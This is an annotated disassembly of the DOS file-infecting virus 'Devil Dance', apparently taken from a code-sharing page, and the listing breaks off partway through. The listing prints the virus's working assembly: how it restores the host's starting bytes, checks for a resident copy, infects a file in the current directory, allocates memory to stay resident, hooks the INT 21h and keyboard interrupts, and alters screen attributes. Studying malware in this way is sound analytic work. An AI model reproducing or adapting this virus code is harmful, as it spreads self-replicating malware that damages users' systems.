?? devil.asm
字號:
; virus Devil Dance
;
; disassembled by Marek A. Filipiak October 31, 1990
;
0100 E9090B JMP 0C0C
; ...
; victim code
; ...
;========================================
; Virus entry point
;========================================
; find offset of virus code in memory
0C0C 8B360101 MOV SI,[0101] ; destination of first jump
0C10 81C60301 ADD SI,0103 ; PSP + length of jump instruction
; restore victim starting code
0C14 56 PUSH SI ; store virus offset in memory
0C15 B90300 MOV CX,0003 ; restore oryginal first 3 bytes
0C18 81C6A703 ADD SI,03A7 ; address of 3 bytes
0C1C BF0001 MOV DI,0100 ; destination
0C1F F3 REPZ
0C20 A4 MOVSB ; move
0C21 5E POP SI ; restore virus base address
0C22 E81300 CALL 0C38 ; check presence of resident part
0C25 7306 JAE 0C2D ; return to aplication
0C27 E86503 CALL 0F8F ; infect one file in current directory
0C2A E82A00 CALL 0C57 ; instal resident part
; return to aplication
0C2D B80001 MOV AX,0100 ; return address
0C30 50 PUSH AX
0C31 8CC8 MOV AX,CS
0C33 8ED8 MOV DS,AX
0C35 8EC0 MOV ES,AX
0C37 C3 RET ; jump to aplication
;---------------------------
; is resident part active?
0C38 06 PUSH ES
0C39 B82135 MOV AX,3521 ; get INT 21h vector
0C3C CD21 INT 21
0C3E 26 ES:
0C3F 807FFD44 CMP BYTE PTR [BX-03],44 ; 'D'
0C43 750F JNZ 0C54 ; no, exit with carry and NZ
0C45 26 ES:
0C46 807FFE72 CMP BYTE PTR [BX-02],72 ; 'r'
0C4A 7508 JNZ 0C54 ; no, exit with carry and NZ
0C4C 26 ES:
0C4D 807FFF6B CMP BYTE PTR [BX-01],6B ; 'k'
0C51 07 POP ES
0C52 F8 CLC ; exit with no carry and Z or NZ
0C53 C3 RET
0C54 07 POP ES
0C55 F9 STC
0C56 C3 RET
;----------------------
; instal resident part
0C57 B8004A MOV AX,4A00 ; change size of allocated memory
0C5A BB0010 MOV BX,1000 ; to 64 Kb (size in paragraphs)
0C5D 0E PUSH CS
0C5E 1F POP DS
0C5F CD21 INT 21
0C61 B80048 MOV AX,4800 ; allocate memory
0C64 BB4C00 MOV BX,004C ; requested size (1216 bytes)
0C67 CD21 INT 21
0C69 FC CLD
0C6A 8EC0 MOV ES,AX ; segment of allocated block
0C6C 56 PUSH SI ; store SI
0C6D 8BDE MOV BX,SI ; virus base
0C6F BF0301 MOV DI,0103 ; destination
0C72 B9AD03 MOV CX,03AD ; virus size (941)
0C75 F3 REPZ
0C76 A4 MOVSB ; move to new place
; first 103 bytes of allocated block serve for virus working area
0C77 26 ES:
0C78 C70600000301 MOV WORD PTR [0000],0103 ; virus base in moved code
0C7E 5E POP SI ; restore SI (virus base)
0C7F 1E PUSH DS ; store current DS
0C80 06 PUSH ES ; store virus ES
0C81 8CC0 MOV AX,ES
0C83 48 DEC AX ; segment of MCB
0C84 8EC0 MOV ES,AX
0C86 26 ES:
0C87 C70601000600 MOV WORD PTR [0001],0006 ; paragraph of block owner
0C8D 07 POP ES ; restore virus ES
0C8E 8CC0 MOV AX,ES ; set DS to new virus segment
0C90 8ED8 MOV DS,AX
0C92 B82135 MOV AX,3521 ; get INT 21h
0C95 CD21 INT 21
0C97 891E0200 MOV [0002],BX ; store INT 21h
0C9B 8C060400 MOV [0004],ES
0C9F BA9B03 MOV DX,039B ; offset of new handler (here 0EA4h)
0CA2 B82125 MOV AX,2521 ; set INT 21h
0CA5 CD21 INT 21
0CA7 B80935 MOV AX,3509 ; get INT 09h
0CAA CD21 INT 21
0CAC 891E0600 MOV [0006],BX ; store it
0CB0 8C060800 MOV [0008],ES
0CB4 C70620000000 MOV WORD PTR [0020],0000 ; reset Alt keystroke counter
0CBA C606150000 MOV BYTE PTR [0015],00 ; reset flag ??
0CBF B80925 MOV AX,2509 ; set INT 09h (keyboard)
0CC2 BAC001 MOV DX,01C0 ; offset of new handler (here 0CC9)
0CC5 CD21 INT 21
0CC7 1F POP DS ; restore carrier DS
0CC8 C3 RET
;-----------------------------
; INT 09h handler (keyboard)
0CC9 CC INT 3 : ?? destroyed by some debugger ??
0CCA FB STI
0CCB 50 PUSH AX ; store AX
0CCC 1E PUSH DS ; and DS
0CCD 33C0 XOR AX,AX ; set DS to 0
0CCF 8ED8 MOV DS,AX
0CD1 A01704 MOV AL,[0417] ; BIOS, shift status
0CD4 2408 AND AL,08 ; extract Alt key
0CD6 3C08 CMP AL,08 ; is active?
0CD8 7503 JNZ 0CDD ; not presed
0CDA E98300 JMP 0D60 ; check for Del key
0CDD 2E CS:
0CDE FF062000 INC WORD PTR [0020] ; keystroke counter
0CE2 2E CS:
0CE3 803E150001 CMP BYTE PTR [0015],01 ; ?? flag ??
0CE8 740B JZ 0CF5
0CEA 2E CS:
0CEB 833E20000A CMP WORD PTR [0020],+0A ; exactly 10 keys were presed?
0CF0 7403 JZ 0CF5 ; yes
; exit
0CF2 EB64 JMP 0D58 ; exit to true INT 9
0CF4 90 NOP
; exactly ten keys has been presed or flag [0015] has been set
; change attribute at curent cursor position
0CF5 52 PUSH DX
0CF6 56 PUSH SI
0CF7 53 PUSH BX
0CF8 06 PUSH ES
0CF9 51 PUSH CX
0CFA BE0301 MOV SI,0103 ; virus base
0CFD 81C62202 ADD SI,0222 ; encrypted part of code (here 0E2Eh)
0D01 2E CS:
0D02 C606150001 MOV BYTE PTR [0015],01 ; set flag
0D07 2E CS:
0D08 8B1E2B03 MOV BX,[032B] ; (here 0E34h)
0D0C 2E CS:
0D0D FF062B03 INC WORD PTR [032B] ; increase attribute counter
0D11 81FB2B03 CMP BX,032B
0D15 7302 JAE 0D19 ; skip counter reset
0D17 EB0A JMP 0D23
0D19 2E CS:
0D1A C7062B032503 MOV WORD PTR [032B],0325 ; reset counter
0D20 BB2503 MOV BX,0325 ; set BX to new value
0D23 CD11 INT 11 ; equipment list
0D25 2430 AND AL,30 ; video monitor
0D27 3D3000 CMP AX,0030 ; monochrome
0D2A 7505 JNZ 0D31 ; no
; mistake!
0D2C B800B8 MOV AX,B800 ; should be B000
0D2F EB03 JMP 0D34
0D31 B800B8 MOV AX,B800 ; segment of video RAM
0D34 8EC0 MOV ES,AX ; initialize ES (video RAM)
0D36 2E CS:
0D37 8A07 MOV AL,[BX] ; number between 09 .. 0E
0D39 50 PUSH AX
; find screen address of current cursor position
0D3A A15004 MOV AX,[0450] ; (DS = 0) get current cursor position
0D3D 86E0 XCHG AL,AH ; swap column, row
0D3F 8ADC MOV BL,AH ; row
0D41 32E4 XOR AH,AH ; AX := row
0D43 32FF XOR BH,BH ; BX := column
0D45 B9A000 MOV CX,00A0 ; 160, length of one line
0D48 F7E1 MUL CX
0D4A D1E3 SHL BX,1 ; mulitply by 2
0D4C 03D8 ADD BX,AX
0D4E 43 INC BX ; attribute field
0D4F 58 POP AX ; restore choosen attribute
0D50 26 ES:
0D51 8807 MOV [BX],AL ; put it on the screen
; exit
0D53 59 POP CX
0D54 07 POP ES
0D55 5B POP BX
0D56 5E POP SI
0D57 5A POP DX
0D58 1F POP DS
0D59 58 POP AX
0D5A FA CLI
0D5B 2E CS:
0D5C FF2E0600 JMP FAR [0006] ; true INT 9
; Alt key is presed
0D60 E460 IN AL,60 ; read keyboard scan code
0D62 3C53 CMP AL,53 ; Del?
0D64 7407 JZ 0D6D ; yes, procede
; exit to true INT 9
0D66 1F POP DS
0D67 58 POP AX
0D68 2E CS:
0D69 FF2E0600 JMP FAR [0006]
; Alt + Del service
0D6D CD11 INT 11 ; equipment list
; again mistake! Decimaly 48 is 30 in hex
0D6F 254800 AND AX,0048 ; ??
0D72 3D4800 CMP AX,0048 ; ??
0D75 7505 JNZ 0D7C
; in hex 0048 meant system with 2 disketts (bit 40) and bit 8 is reserved
; (on PC, XT and Jr it and bit 4 reflect size of RAM on system board in 16 K)
; so probably AX and 48 almost always will be equol 48.
0D77 B800B0 MOV AX,B000 ; monochrome
0D7A EB03 JMP 0D7F
0D7C B800B8 MOV AX,B800 ; other
0D7F 8EC0 MOV ES,AX ; initial ES to video segment
0D81 8CC8 MOV AX,CS ; restore DS
0D83 8ED8 MOV DS,AX
0D85 33FF XOR DI,DI ; clear screen location pointer
0D87 B407 MOV AH,07 ; attribute
0D89 B0B1 MOV AL,B1 ; chracter ?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -